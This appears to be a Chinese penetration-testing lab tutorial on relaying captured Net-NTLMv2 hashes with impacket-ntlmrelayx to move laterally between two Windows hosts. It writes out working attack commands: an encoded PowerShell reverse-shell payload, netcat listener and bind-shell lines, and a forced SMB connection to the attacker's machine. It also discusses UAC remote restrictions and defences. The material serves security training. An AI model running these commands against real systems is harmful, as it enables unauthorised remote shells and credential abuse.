2026/4/6 10:24:36
网站建设
项目流程
网页制作怎么建站点,优秀电子商务网站,e福州下载app,空间设计logo郑重声明#xff1a;本文所涉安全技术仅限用于合法研究与学习目的#xff0c;严禁任何形式的非法利用。因不当使用所导致的一切法律与经济责任#xff0c;本人概不负责。任何形式的转载均须明确标注原文出处#xff0c;且不得用于商业目的。 #x1f50b; 点赞 | 能量注入…郑重声明本文所涉安全技术仅限用于合法研究与学习目的严禁任何形式的非法利用。因不当使用所导致的一切法律与经济责任本人概不负责。任何形式的转载均须明确标注原文出处且不得用于商业目的。点赞| 能量注入 ❤️关注| 信号锁定 收藏| 数据归档 ⭐️评论| 保持连接立即前往晖度丨安全视界▶ 信息收集▶ 漏洞检测▶初始立足点▶ 权限提升▶横向移动 ➢ 密码攻击 ➢ 传递Net-NTLMv2哈希▶ 报告/分析▶ 教训/修复目录1.密码破解1.1 破解Windows哈希实践1.1.4 传递Net-NTLMv2哈希概述1.1.4.1 攻击背景1.1.4.2 攻击流程1.1.4.3 UAC远程限制与中继攻击关系解析1.UAC用户账户控制远程限制2.中继攻击Relay Attack3.UAC限制与中继攻击的关联1.1.5 传递Net-NTLMv2哈希实践1.1.5.1 攻击流程图1.1.5.2 使用ntlmrelayx捕获与中继1.1.5.3 设置反向Shell监听器1.1.5.4 触发SMB连接1.1.5.5 在ntlmrelayx的终端下看到中继到FILES021.1.5.6 在Netcat监听器捕获到FILES02的反向shell1.1.6 现实环境限制UAC远程限制的影响1.1.6.1 UAC远程限制的影响1.1.6.2 攻击成功条件欢迎❤️ 点赞 | 关注 | ⭐️ 收藏 | 评论1.密码破解1.1 破解Windows哈希实践核心攻击场景本文介绍第三种获取并破解Net-NTLMv2哈希。攻击类型目标哈希手法简介获取并破解NTLM哈希️ NTLM哈希从内存或SAM数据库中提取哈希并用工具如Hashcat破解传递NTLM哈希️ NTLM哈希直接使用哈希进行身份验证绕过密码需求获取并破解Net-NTLMv2哈希 Net-NTLMv2哈希通过中间人或欺骗获取挑战-响应包离线破解传递Net-NTLMv2哈希 Net-NTLMv2哈希在支持的环境下复用Net-NTLMv2响应进行身份验证1.1.4传递Net-NTLMv2哈希概述1.1.4.1 攻击背景当获取到用户的 Net-NTLMv2 哈希后却无法破解如密码过于复杂时攻击者可通过“哈希传递”继续渗透。本文介绍如何在无法获得明文密码的情况下利用哈希中继实现横向移动。 核心前提主机 AFILES01与主机 BFILES02的认证凭据即密码的 NTLM 哈希必须相同。基于用户名files02admin可推测该用户可能是FILES02 的本地管理员从而尝试将哈希中继至 FILES02。1.1.4.2 攻击流程 详细步骤说明步骤操作说明1️⃣建立 SMB 服务器攻击者使用 Responder 模拟 SMB 服务器并监听2️⃣绑定 Shell在目标机FILES01上通过 netcat 等工具监听端口并获取 Shell3️⃣发起 SMB 连接从目标机 Shell 中使用dir等命令连接攻击者的 SMB 服务器4️⃣捕获并转发哈希Responder 捕获 Net-NTLMv2 哈希并将其转发至 FILES025️⃣验证身份若files02admin在 FILES02 上为有效本地用户则身份验证通过6️⃣执行命令通过 psexec、wmiexec 等工具在 FILES02 上远程执行命令⚠️ 攻击成功关键点✅哈希一致性两台主机上的用户密码哈希必须相同。✅用户权限目标用户files02admin在目标主机上需具备足够权限如本地管理员。✅网络可达攻击者机器可与目标主机进行 SMB 通信。1.1.4.3 UAC远程限制与中继攻击关系解析在此处顺便详细解释下UAC用户账户控制与中继攻击的关系。1.UAC用户账户控制远程限制UAC用户账户控制是Windows的核心安全机制旨在阻止未授权的系统级操作。当进行需要管理员权限的操作时会弹出提示要求用户确认。 远程限制特点特性说明默认启用Windows默认启用对远程会话中的管理员权限施加限制保护机制即使远程用户拥有管理员账户也无法直接执行特权操作安全意义防止远程攻击者轻易获取完全控制权⚡ 两种状态对比2.中继攻击Relay Attack攻击原理攻击者作为中间人截获并转发认证信息在不获取密码的情况下冒充合法用户。攻击流程图3.UAC限制与中继攻击的关联目标系统状态攻击者权限推荐攻击方式难度等级UAC远程限制已禁用拥有管理员账户直接特权操作⭐☆☆☆☆UAC远程限制已启用默认拥有管理员账户中继攻击绕过⭐⭐⭐☆☆ 绕过机制当UAC远程限制启用时中继攻击成为绕过限制的有效手段 身份伪装通过转发其他用户的认证信息攻击者可以绕过权限检查⚖️ 安全平衡UAC限制增加了攻击难度但无法完全防御中继攻击防御核心要点UAC远程限制是Windows的重要安全边界不应轻易禁用中继攻击利用认证协议弱点是绕过UAC限制的常见技术攻击者根据目标系统的UAC设置动态调整攻击策略纵深防御策略UAC网络监控强认证能有效降低风险1.1.5传递Net-NTLMv2哈希实践1.1.5.1 攻击流程图利用ntlmrelayx工具进行NTLM中继攻击通过捕获SMB认证请求并转发至目标主机最终获取反向Shell控制目标系统。1.1.5.2 使用ntlmrelayx捕获与中继启动ntlmrelayx中继服务$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c powershell -enc JABjAGwAaQBlAG4AdA... 命令解析Base64编码命令隐藏PowerShell反向Shell代码规避检测核心参数详解参数作用impacket-ntlmrelayx启用NTLM中继攻击核心工具--no-http-server禁用HTTP服务器专注SMB协议-smb2support支持SMB2协议提高兼容性-t 192.168.50.212指定中继目标FILES02-c powershell -enc...认证成功后目标上FILES02执行的命令是Base64编码命令隐藏PowerShell反向Shell代码规避检测1.1.5.3设置反向Shell监听器# 攻击者的kali的新终端中执行 $ nc -lvnp 8080 目的监听8080端口等待ntlmrelayx中继后FILES02发起的反向Shell连接1.1.5.4触发SMB连接注意这里有个前提攻击者能够在远程目标系统FILES01上获得了代码执行权限然后绑定 Shell它是一种攻击者通过远程命令执行将目标主机系统的命令行界面绑定到特定端口的攻击技术。一旦成功攻击者可通过网络直接连接到该端口获得目标系统的交互式 Shell 访问权限。# 在远程目标系统FILES01上绑定Shell命令正常shell nc -l -p 5555 -e /bin/bash现在在kali的另一个终端中运行Netcat以连接到FILES01上的绑定shell端口5555。连接后将输入dir \\192.168.119.2\test以创建与我们的Kali机器的SMB连接。同样远程文件夹名称是任意的。# 连接到FILES01的绑定Shell5555端口 $ nc 192.168.50.211 5555 # 在FILES01的Shell中执行 dir \\192.168.119.2\test⚡ 触发机制通过dir命令强制FILES01向攻击者的Kali机器发起SMB连接任意共享名test触发认证过程1.1.5.5 在ntlmrelayx的终端下看到中继到FILES02上述步骤执行后在kali的ntlmrelayx的终端下会看到以下信息成功将捕获到的Net-NTLMv2哈希中继到FILES0250.212上并认证成功1.1.5.6 在Netcat监听器捕获到FILES02的反向shell然后在kali的Netcat监听器捕获到来自FILES02的反向shellBase64的powershell命令---反向shell我们成功启动的SMB连接获取和中继Net-NTLMv2哈希拿到了FILES02的shell权限。关键输出过程解析SMB连接接收ntlmrelayx成功捕获来自FILES01的SMB连接使用NTLM认证中继攻击者将FILES0150.211的认证信息转发至FILES02身份验证成功FILES02接受了转发来的认证凭据并身份认证成功PowerShell命令执行在FILES02上运行Base64编码的反向Shell连接回kali攻击步骤总结步骤操作结果1启动ntlmrelayx中继服务SMB服务器监听建立2设置Netcat监听(8080端口)反向Shell接收端就绪3连接FILES01绑定Shell获得FILES01访问权限4执行dir \\Kali_IP\test触发SMB连接和认证5ntlmrelayx捕获并中继NTLM认证转发至FILES026FILES02执行PowerShell命令反向Shell建立7Netcat捕获反向Shell获得FILES02控制权1.1.6现实环境限制UAC远程限制的影响1.1.6.1 UAC远程限制的影响然而在现实中如果目标系统启动了UAC远程限制则在Active Directory环境中是域管理员Domain Admin权限时还是可以进行哈希传递或中继攻击但是在本地管理员账户的远程登录行为进行权限限制。如下环境类型账户类型UAC远程限制的影响哈希传递/中继攻击可行性Active Directory域环境域管理员Domain Admin通常影响较小域管理员在远程登录时可能仍获得完全权限较高可利用域管理员权限绕过限制Active Directory域环境域用户在目标机有本地管理员权限可能受限制远程登录时令牌被过滤中等可能需要额外绕过技术工作组环境非AD本地管理员账户严格限制默认启用远程限制较低难以直接执行特权操作AD环境 vs 非AD环境对比环境类型UAC影响中继攻击可行性说明Active Directory域内可能受限中等域策略可能覆盖本地设置工作组环境非AD显著限制较低本地UAC设置起主导作用UAC完全禁用无限制高攻击可直接执行特权操作⚡关键限制因素 权限降级远程会话中管理员令牌被过滤缺少特权️ 本地安全策略UAC设置可能阻止远程代码执行 认证上下文中继的认证可能缺乏必要的安全标识符(SID)1.1.6.2 攻击成功条件✅成功条件本次实验UAC限制已禁用或配置允许远程管理用户账户一致FILES01和FILES02使用相同凭据网络策略允许SMB通信和反向连接未被阻止❌现实挑战默认Windows设置UAC远程限制通常启用现代防护机制Windows Defender可能拦截异常PowerShell网络监控企业环境通常有IDS/IPS检测异常SMB活动攻击演进趋势随着Windows安全特性的不断增强传统NTLM中继攻击的有效性逐渐降低。攻击者正转向更复杂的多阶段攻击和凭证盗窃技术防御方需保持持续的安全更新和威胁情报跟进。欢迎❤️ 点赞 | 关注 | ⭐️ 收藏 | 评论每一份支持都是我持续输出的光。